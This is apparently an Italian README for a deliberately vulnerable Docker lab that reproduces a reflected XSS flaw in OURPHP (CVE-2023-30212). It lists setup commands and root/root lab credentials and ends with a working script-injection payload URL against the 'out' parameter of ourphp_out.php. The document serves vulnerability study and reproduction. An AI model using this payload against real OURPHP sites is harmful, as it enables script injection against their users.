
Questo contiene i file necessari e il Docker per replicare una vulnerabilità in OURPHP che presenta una vulnerabilità XSS (CVE-2023-30212)
Questo contiene le directory necessarie e il Dockerfile per replicare una vulnerabilità di tipo XSS in OURPHP (CVE-2023-30212).
PREREQUISITI
Scarica Docker
sudo apt install -y docker.io
Scarica i file da questo repository usando git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Questo contiene le directory necessarie e il dockerfile per replicare lo scenario.
Dopo aver scaricato i file, crea un'immagine Docker usando
sudo docker build -t <Give_Suitable_Docker_name> . .
! Aggiungi un nome all'immagine Docker in modo che possa essere richiamata in seguito.
Converti l'immagine Docker in un container usando
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Qui la porta del container è mappata sulla porta 80.
Per vedere lo stato del container Docker,
sudo docker ps
Dopo aver eseguito questi passaggi,
Vai su localhost e configura OURPHP con le seguenti credenziali. Nome utente : root Password : root Nome del database: data
Ora devi configurare nome utente e password per l'amministrazione. Imposta quanto segue: Nome utente: root Password: root e procedi
Quindi il nostro payload è
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
aggiungi questo insieme a localhost o 127.0.0.1 per attivare la XSS.